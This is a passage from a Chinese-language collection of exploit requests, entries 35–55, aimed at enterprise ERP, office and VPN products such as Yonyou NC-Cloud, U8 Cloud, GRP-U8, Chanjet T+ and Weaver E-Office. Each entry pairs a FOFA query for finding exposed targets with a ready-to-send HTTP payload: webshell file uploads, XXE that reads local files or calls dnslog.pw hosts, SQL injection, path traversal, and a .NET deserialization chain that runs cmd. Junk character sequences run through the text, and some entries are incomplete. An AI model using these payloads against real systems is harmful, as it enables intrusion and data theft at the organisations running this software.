Accept-Encoding: gzip, deflate
2 L& p: E4 n3 `  q7 J. PAccept: */*
1 S; ]- D1 ], h8 t2 {Connection: keep-alive7 d* u* _4 Y8 D+ z

6 |  W% F1 Q# k6 W9 {% V8 l& M; K5 u4 N# K4 z
35. 用友NC-Cloud importhttpscer任意文件上传' W+ S& O% |8 M( ?
FOFA:app="用友-NC-Cloud"& j$ k1 P8 U/ R. d: ]
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
/ R) Z; h! x& q! tHost: 203.25.218.166:8888
% i8 h* Z* X4 T% N- |- F" IUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info4 h: |7 y! h/ k3 E" T
Accept-Encoding: gzip, deflate1 p' r4 v+ }; u0 t
Accept: */*
+ z. W; p6 N# T& R, BConnection: close5 S- ^6 {! N( E% B- O# z& k' H( f
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
7 ], z- X( B% V# f! E( QContent-Length: 190
9 Z8 _) Y4 U$ BContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
* s! ]$ M* j5 B* o* Z* ~3 g- |/ W
- a' ?8 a7 v& S! b' r# V$ ]% `--fd28cb44e829ed1c197ec3bc71748df09 R! ~! v" {7 C6 u5 t
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"# X& u9 ^/ X- h4 B( I4 i8 q

% n7 X& o5 [/ q<%out.println(1111*1111);%>
- m+ x* q; r/ }8 L4 w" L* o--fd28cb44e829ed1c197ec3bc71748df0--
4 r+ ~/ T, t( c0 @" x
/ Y0 w- s3 c3 U6 n2 d% s5 N  M$ H. _8 x8 A, K
36. 用友NC-Cloud soapFormat XXE  y. z, d3 _) y* T! t4 v# W: Q
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
+ o0 }, U: l% B: JPOST /uapws/soapFormat.ajax HTTP/1.15 i# p0 P3 o, v: J
Host: 192.168.40.130:8989
3 @$ D( u- {6 D- S% f: yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
. u) k. j. V* b) _+ vContent-Length: 263
7 Z- M+ l% S# [* `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( D3 ^6 C6 ?0 |4 BAccept-Encoding: gzip, deflate
; j; b" E" u/ s  H7 d( B1 ]3 P3 KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* y) @4 P. V# W9 e& y
Connection: close
1 B' b% `! B- e0 e/ a( ?( XContent-Type: application/x-www-form-urlencoded) U% {/ h- M' F; Y0 F% r
Upgrade-Insecure-Requests: 1
' k, k* ~7 k0 `1 r9 M8 f
7 P  @/ E, x9 V, a) I' w0 k$ fmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
8 N1 i2 [& d$ n& [4 j" @# J, ]# p' u( J# U9 c; Q
6 r9 n- F1 H4 |, Y" `- {
37. 用友NC-Cloud IUpdateService XXE
, I# L, b/ z- |$ Y/ y; a9 l' }FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"! g# T8 J5 n$ e* \. w
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
. o5 t, Q4 M: r: o& t* S, rHost: 192.168.40.130:8989
+ v. ]4 @! T' T, D" E  F0 g+ IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36, k& A3 m9 B5 I/ @
Content-Length: 421- A0 N5 g0 y  S9 a! J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
: B" k* j% t# q5 R3 OAccept-Encoding: gzip, deflate
7 S% E, C# q5 H% ZAccept-Language: zh-CN,zh;q=0.9/ }/ I' s+ t% p0 }" k8 }
Connection: close
; J& [9 @. n6 }+ kContent-Type: text/xml;charset=UTF-8. M% h. u9 W+ X$ d& U# U
SOAPAction: urn:getResult% G; t3 {8 e" {* R, G. ~
Upgrade-Insecure-Requests: 17 G! I  [2 O% S

, W8 \( o; H2 x. H! v<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
3 B+ K6 s& H% k9 m<soapenv:Header/>
8 X$ v4 Y6 G# ~. l3 H* [' z; k<soapenv:Body>  k2 ]3 D% z, p" O* Y; n0 P! @
<iup:getResult>8 r1 O5 }6 {9 }+ e  s
<!--type: string-->6 |2 o0 O. g6 A4 p$ P, w- y  H
<iup:string><![CDATA[2 A9 ]. o# u+ E2 V
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
2 ^  }: \+ E4 c$ l<xxx/>]]></iup:string>
' _+ P3 p. }* J% D! i</iup:getResult>
6 x# v2 U- Q$ {. ~1 U9 x; Q</soapenv:Body>. y5 G0 }! B; I8 s
</soapenv:Envelope>7 I7 M2 ^1 D+ s/ W$ V
; o# e6 L1 x2 O2 B+ U2 Q
& [; z7 P/ `( x/ ~
+ Q; l% E: g( R, k- C  X
38. 用友U8 Cloud smartweb2.RPC.d XXE
5 }/ N% x# T$ Q- ~  L1 YFOFA:app="用友-U8-Cloud"% V) {: n* L; d! r+ S
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
6 v. E$ K+ c8 N7 C7 BHost: 192.168.40.131:8088: @! m  |6 p4 k* C3 T- u8 ?% X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
' j2 e5 S# L4 q. r8 s2 k4 L" K; eContent-Length: 260
1 c, R4 h5 ?" a, cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3! L1 v' @8 ~& N, Y4 I0 O: e! p
Accept-Encoding: gzip, deflate
0 e# S+ p! q. o7 ?+ ~' h# X: cAccept-Language: zh-CN,zh;q=0.9& c+ A+ x+ Q; X; M: A/ a: D
Connection: close
7 S& I; M! g: UContent-Type: application/x-www-form-urlencoded
4 i1 N" B# P" Y
- l" {' p8 c1 R# Y# X- B; {* x: p1 S__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>9 ]1 l; v. N: X3 W8 Q
: \" x# y0 y+ M% z  r9 |

" h. L9 m8 k. Y9 r8 k' a39. 用友U8 Cloud RegisterServlet SQL注入6 X6 K  j3 Q' A. b6 T0 y
FOFA:title="u8c"8 e  `& e% D4 |/ w$ W6 W; D. r
POST /servlet/RegisterServlet HTTP/1.1
$ e$ K, G; v9 y; B; K0 ?Host: 192.168.86.128:80896 t" a2 i3 N! {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.364 c/ W: N/ a/ d. D6 p4 {
Connection: close
  X0 Z/ M' H7 ]. l* t6 ~% c8 G/ o9 rContent-Length: 85( v( [* i( g% c3 x2 j' t9 U; D$ `. q
Accept: */*
8 q: ?. j4 c2 L$ fAccept-Language: en
" y5 h0 k% o* mContent-Type: application/x-www-form-urlencoded
" f) Y/ e% S' |( o1 a3 H' NX-Forwarded-For: 127.0.0.16 y. Q8 _/ R+ l' V: |
Accept-Encoding: gzip& s" X; X- `4 h/ @6 G

/ ?! g. j# c8 Musercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
+ f( U4 o; P) C; W" f; F" j/ b0 v' m- H) h6 [3 ]

1 ]* q& z/ q3 e7 t1 z3 h2 s# d7 t0 y40. 用友U8-Cloud XChangeServlet XXE
$ ^9 F" Q1 ?8 E' d! x( ZFOFA:app="用友-U8-Cloud"
) R+ Z& I; s" E/ H% k/ DPOST /service/XChangeServlet HTTP/1.1' e- N# P) Q5 |" k0 R$ ^
Host: x.x.x.x% o* l# y: R1 q( J5 D; ~/ d
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
2 B) x# {  ?3 ^Content-Type: text/xml
$ ~$ H8 w8 h8 R1 F! h/ lConnection: close$ L. k4 V7 f8 \& N  [( s$ ]. d6 \

  l( F: W* R& ~8 ?! T9 A<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
) j8 o0 f5 t* C" N; K, Z4 ^% n  H0 H( I' p7 F( g: }
) D0 U& F- [' K! Z; c
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
* R- G5 f" I7 k8 n: O- I- dFOFA:app="用友-U8-Cloud"
1 o. s0 {  X! M1 OGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1! N1 ~4 F9 H. I" d+ R# x
Host:
8 [9 B4 e( n5 E2 a% @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! Z7 p: }1 w% Y, D
Content-Type: application/json* h/ W0 F+ U7 T& J5 B9 V
Accept-Encoding: gzip
# O! ~" x) V4 q+ B  c9 nConnection: close
& q0 ~% f; Q; {5 X) e1 ~5 @5 \
9 h, a" o) ]0 z; A( A
42. 用友GRP-U8 SmartUpload01 文件上传
6 v+ K0 E* M6 EFOFA:app="用友-GRP-U8"; x' u& }! \5 c% A4 ]. f4 j
POST /u8qx/SmartUpload01.jsp HTTP/1.1
% T% ^) ?7 c% s; ^Host: x.x.x.x
: x- ?# X. w2 \5 @4 ]9 mContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt' j  ^( s, }& {' {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.366 {8 I0 o2 A- T2 _" R- j! Y" }

$ W7 u# k/ j, x1 IPAYLOAD
; M9 S' P7 d2 X* l1 j3 K2 r6 i4 T& B6 W
4 Q1 m0 N6 z4 _' r; `, _  |8 j
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml5 _( B$ k; R6 X: F& r+ y

- K& @5 H* K% _3 ?8 Y5 [1 r- A43. 用友GRP-U8 userInfoWeb SQL注入致RCE
9 \3 c! r1 E. f( T+ [$ {4 w; ^FOFA:app="用友-GRP-U8"' i/ {- a! u" J9 h6 ]) e1 \: D
POST /services/userInfoWeb HTTP/1.1
5 ?9 ?4 k3 b* F. K* R+ Q/ oHost: your-ip% e6 t) K. [8 G* L1 @, C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.367 m+ r, Y$ c+ v& z1 h& B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 V0 @) U$ i" s3 x' A$ sAccept-Encoding: gzip, deflate, |* e9 w- E* V7 w0 H
Accept-Language: zh-CN,zh;q=0.9
6 W& }$ V. ^5 K2 ~- C: z) |: eConnection: close0 x3 s/ L" V( i, D2 I" G
SOAPAction:
* W' |7 X. Q  V3 S" F  KContent-Type: text/xml;charset=UTF-8
! S- k+ T; U$ f1 E- r0 H0 O& e
/ t9 k7 W0 z/ |/ l: M* }<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">2 }8 P" s( v5 {' P4 _% z
   <soapenv:Header/>
0 u9 W) E3 e9 `+ k# G$ n   <soapenv:Body>1 j) G# f+ W0 Z* o' e$ U
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">6 v3 d' H% s9 `  B- p% v
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>5 |7 A5 r( c6 W3 w! @
      </ser:getUserNameById>
9 F- j  ^0 r; x; L5 i   </soapenv:Body>9 I: |- y$ N4 T9 M; u# a
</soapenv:Envelope>
1 @3 Y% I' R- X% l0 i' _7 P& v- L7 ?# q( C* G! I7 B
' F+ a; S8 D* ~: a
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
# m7 m2 K0 a& {% V; f  J2 w7 hFOFA:app="用友-GRP-U8"
, V8 P5 g, i5 b! @0 [) n# xGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
# F+ E- o6 r$ E; i- ?, f. FHost: your-ip& Z1 m8 H5 Z5 ~- r, J5 D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.364 f( L/ H; w; a3 y/ ?2 Y, Y, k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- n' h, O/ R# s* r. j! iAccept-Encoding: gzip, deflate7 Z5 h8 Z! y5 N4 h  J1 ], m
Accept-Language: zh-CN,zh;q=0.9
  ~# F" u4 F; }2 lConnection: close
* L+ V0 Q! }% k: X* y# K) h8 N7 R- y, N) k# [4 ?

% P0 O% ~( |. u/ l8 l45. 用友GRP-U8 ufgovbank XXE0 t" [- `8 T9 P/ ^9 }. {1 U
FOFA:app="用友-GRP-U8"& i- j/ P' b/ b' M" a8 X
POST /ufgovbank HTTP/1.1
  e& R8 Y& r/ V( k$ {Host: 192.168.40.130:222
0 l# A3 I/ r5 L7 `9 h/ kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.01 B  J+ |0 A6 Q6 `. u
Connection: close
2 _4 y! {2 m  x1 [Content-Length: 161
. |* K. a# C8 d8 KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ i7 A* a# B, D: G# dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! s6 l% Y6 M$ B  s" c# aContent-Type: application/x-www-form-urlencoded
2 r. k! h' \! |Accept-Encoding: gzip
) m2 r4 Z: u0 N) U6 [6 f8 z( d- R7 g+ b& G2 R
reqData=<?xml version="1.0"?>
) {- |3 `. {  Q0 s2 U7 v( c<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest/ [* n5 Q' G, P" d8 Q

! y0 W0 G4 _6 {. L9 _& b' z8 ~. d3 p& v7 f& I! h
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
! z& n( V' q& N3 U+ AFOFA:app="用友-GRP-U8"
9 X# N+ u. x6 t8 _GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1$ H7 L- b. x( E* E, S( Z
Host: your-ip
3 z+ ~/ Y* `1 I, h% \* I1 YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
. ^: s' g5 H/ ?  N% U  gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. T, n$ m0 |& g% z5 N
Accept-Encoding: gzip, deflate) s$ ~/ w& ~9 J; {( a
Accept-Language: zh-CN,zh;q=0.9
4 [) \; r& z- ?' l4 P- L  TConnection: close5 |. f$ z7 B/ Y4 ?

* Z" y- G, D! u  i- ?
$ g1 A& b; q" j$ z' }) X; |# O47. 用友GRP A++Cloud 政府财务云 任意文件读取5 z8 _: ?6 G! `) C
FOFA:body="/pf/portal/login/css/fonts/style.css"
: f0 j2 Y' \2 ~8 jGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
  W5 {8 R8 j8 F1 o  ^  D3 KHost: x.x.x.x
5 M+ |, }8 _6 t( \Cache-Control: max-age=0
6 N: N: B7 v# Q& D& X/ d5 J! }Upgrade-Insecure-Requests: 17 d$ j* T4 Z! k" e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
7 g3 f3 O7 \  p% i# Z* K8 tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 U7 P# f, x- z. G$ {
Accept-Encoding: gzip, deflate, br- T% [" O/ x! q3 r6 Q
Accept-Language: zh-CN,zh;q=0.9- f/ k+ ]5 ?2 e2 X) Q+ l
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
+ Q, m# ~$ G- t5 fConnection: close
& Y# o9 g% t6 Y* ~( g7 q/ b" o, P: D) y5 h7 g

8 E$ B9 |8 V: y7 n4 h0 m* v5 k8 `2 J
48. 用友U8 CRM swfupload 任意文件上传
( z' o* }6 w  s9 {7 eFOFA:title="用友U8CRM"# i7 D6 J  ^0 b8 ]& h( X
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1# O% Z& |9 S$ P  ?% b5 @
Host: your-ip0 T; [1 X$ a% ^- ]( p5 E0 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.07 `4 f& t, V' V; _4 p) d1 u5 y" ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- M* c/ K6 A, N1 X+ _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: O+ V' r) P. c/ m7 T- hAccept-Encoding: gzip, deflate/ ]! V, w; T- s( ]; s7 V5 g
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855% C$ Y* N9 q0 Z* U! V. P- U$ ~
------269520967239406871642430066855
6 g: I7 y2 i2 H" u1 ]# KContent-Disposition: form-data; name="file"; filename="s.php"0 f, h/ k' b, S' H
1231
  {9 t7 O/ J4 H% h% LContent-Type: application/octet-stream
6 X5 m. V" \7 P+ O5 g( z1 t------269520967239406871642430066855; c5 B% {8 C2 [
Content-Disposition: form-data; name="upload"5 p0 p( Z& m: D! i1 ~
upload
# b, d3 r0 h+ x, C9 a. R$ c------269520967239406871642430066855--4 n* n) x, Q- c! U0 i& E
& n; {/ ]' `: J9 S: i

) |. A- p- i; G* r49. 用友U8 CRM系统uploadfile.php接口任意文件上传( l& C0 l6 r# e9 U; i8 }% s' T3 H
FOFA:body="用友U8CRM"
& F; Y) a7 h+ P/ ]
, a+ A( o# j' f1 bPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
% w! _/ t3 o* A* ?Host: x.x.x.x
, ~- D3 Z3 Y" g3 n" K4 C# l* sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
) _; S3 U* e) K2 AContent-Length: 329
; {1 n) k' `# y; S. O# TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 a8 B$ V1 o7 G9 W- k/ a8 f, @
Accept-Encoding: gzip, deflate
! b$ \  b, K# C7 Z1 |+ d! a( XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) W; T9 O$ \) z) F7 A
Connection: close) B1 a+ A3 a/ p; H/ n& \5 Z9 ]
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
# d, @& x1 A# B3 y9 x. C: D. f' H  {6 k
" [5 m# `9 W  s# M-----------------------------vvv3wdayqv3yppdxvn3w
# l+ Y0 l8 h- r% ^% xContent-Disposition: form-data; name="file"; filename="%s.php "
% P$ ?% J- f( L9 ~8 E* HContent-Type: application/octet-stream
+ f$ [; N! ^' Z, g3 z. R/ C( E  W
2 U! V, J8 D: Qwersqqmlumloqa3 P0 [4 m1 ?% X
-----------------------------vvv3wdayqv3yppdxvn3w- T; }8 q9 A0 P' q3 q& h  c
Content-Disposition: form-data; name="upload"& Y; ^; ^/ X! R
5 ?* @2 N) B- c6 [
upload
' @1 }3 S) k; c% Y* v2 ?-----------------------------vvv3wdayqv3yppdxvn3w--
. F' c3 S: u; I9 v; f. G; P
/ |0 L/ I2 _* ~8 W, }6 H0 N
5 e& j7 h" A% x3 @$ f# O, w$ zhttp://x.x.x.x/tmpfile/updB3CB.tmp.php
8 ~  E8 a9 a$ r, t( N' k; ]' r$ M9 j" r  [; k
50. QDocs Smart School 6.4.1 filterRecords SQL注入8 n8 y' H6 l# v0 `
FOFA:body="close closebtnmodal"" h& b0 P7 l+ t0 e8 H+ V' E
POST /course/filterRecords/ HTTP/1.1
7 n& j7 C' `% y$ c$ K% R) e0 DHost: x.x.x.x
3 N5 F/ c! L/ u8 V0 u8 {User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36$ I9 s5 f5 I3 x& b. n- z4 c) Z
Connection: close
8 i6 A! W" e5 }8 vContent-Length: 224
) A3 o& h* K( {; g: n# U* l. s6 HAccept: */** r$ K. A. m2 ]% q
Accept-Language: en
0 h! `! b/ F0 Q) @7 l5 SContent-Type: application/x-www-form-urlencoded4 e' l3 O5 D, Q, u* J& X7 c8 K* h
Accept-Encoding: gzip- A! q1 S2 z$ j( c. n9 ~
! V- k: k( R2 Y4 j, |
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=12 `2 X$ a( u; W, B% W" t6 a& @4 {& I

! `7 Z* ]+ z+ q; Z) X
: I9 F2 I4 f. W1 S5 ^51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入4 H9 O% |* x: @$ B4 ]  q
FOFA:app="云时空社会化商业ERP系统"
: L* u" O! r! Y0 o( k/ FGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
9 F4 F+ N9 Q9 GHost: your-ip% |# @5 I: _. q* J
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36: _  E* P8 c5 m/ m9 W8 R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9- e- C1 U, f! K8 q$ [$ x
Accept-Encoding: gzip, deflate6 a. Y% q& L' v7 g9 t4 _8 g
Accept-Language: zh-CN,zh;q=0.9- P, P4 m) v$ g; ^( B2 u* O1 ]
Connection: close
3 t) ]( S" D" ^
: V% |! D8 _6 T4 u* M; Y0 W2 G& a( U0 A9 z+ X$ n
52. 泛微E-Office json_common.php sql注入! J1 ~, H) Y9 a8 L( O
FOFA:app="泛微-EOffice"9 h) I/ G5 `! T2 b% z- d+ Z
POST /building/json_common.php HTTP/1.1
( ]6 J" D9 Q4 v) K$ i# J) FHost: 192.168.86.128:8097
# X& _4 d5 d" t) ]3 @& P' o9 gUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
. j  I2 _. o6 v: c* KConnection: close
' j; n7 B) y- T/ f6 oContent-Length: 87' J0 U& D. s/ C# e+ T
Accept: */*
" p( j/ U8 h. h! v: A5 V! R; K8 sAccept-Language: en: ?: J8 G6 f% |: P6 d
Content-Type: application/x-www-form-urlencoded
5 {  p( B8 p  _. T1 H. DAccept-Encoding: gzip
" F/ u0 `1 X" _. q' [- \* T- K* K8 j1 b  v1 \$ ]4 U1 C
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333) w) E! J% y6 x+ V: P

7 X. ~5 A( O8 G& y3 r+ q2 c  S4 z# `6 X: @! n' p- @
53. 迪普 DPTech VPN Service 任意文件上传9 y3 t! e( F2 `$ p) V, k
FOFA:app="DPtech-SSLVPN". ?# ^6 s8 Z  t0 M# I
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
4 X5 y: }/ }( y7 X7 E5 Y; |* a% c
' ~. h! L; u/ \% }2 t% ]- W3 L9 A# K; a. S6 u/ O
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
9 g9 S& {; E" |6 aFOFA:app="畅捷通-TPlus"
% p0 _. K7 d! j; ]: _; t9 P8 k第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件2 S8 x% o; T- ]' S3 K! A( r8 a
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"9 @1 z# \3 D3 ?+ J0 }% ?# y
5 y, \! P  \7 O3 J; ^8 H2 f0 y( \/ T

. l2 _% _5 U3 A9 R完整数据包
2 c4 A8 k; R( D3 X9 `9 b  YPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.18 F( y- v2 A+ t! S
Host: x.x.x.x  D. K9 I8 r$ N4 ~" [) D; s
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
3 h1 u+ x. L7 XContent-Length: 5934 C& d7 v  G0 z! s- m! b
, g5 H: g3 V- a: z# N
{! g9 ~3 M  ]* R  E" T; `
"storeID":{. j$ |  Z% S( ?
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
5 R( f" b" s; K! W% w. M "MethodName":"Start",! h) H% N. f/ }6 t
  "ObjectInstance":{
9 G- W4 [$ Q7 g1 g2 ]) u   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",5 L5 ^& Z# L$ B! z2 X% [2 G& d
    "StartInfo":{! q, D" E6 T* p" d5 p
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
7 s/ q9 `: [6 ?" U. _3 s) G4 l    "FileName":"cmd",( [! W0 J7 `/ T9 I. {
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
3 s, M5 e# c' b9 A& b, _' \    }
3 F) K. ~3 @6 `6 {9 ?2 B6 X  }  @0 B% A1 Q/ Y4 m' a
  }8 E* Q' J2 L4 o  c% H
}' S& G; v. K6 V' w* k
# \4 B0 q' `, i1 G9 d* H" b

- H1 d0 ]3 r& V1 f第二步,访问如下url
9 ~0 ^6 [+ L9 e7 l/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt+ v4 u9 O% t3 h! o( b

& l4 Z; x* G" l7 F+ q3 d" P8 g- L8 \1 Y! x7 O3 ~: t6 D4 a8 p5 p
55. 畅捷通T+ getdecallusers信息泄露
1 [  N4 o, @  ~: s/ FFOFA:app="畅捷通-TPlus"9 f3 B% n# d! B; T* q( i! K1 }
第一步,通过& u1 R5 q( f/ W( V
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
3 u5 A- {2 J" }( R9 ^第二步,利用获取到的Cookie请求  L" K% m1 F* e; p+ O8 k7 r
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
# |# W0 @+ l8 x% q$ T- Z* J5 }( D% e& u
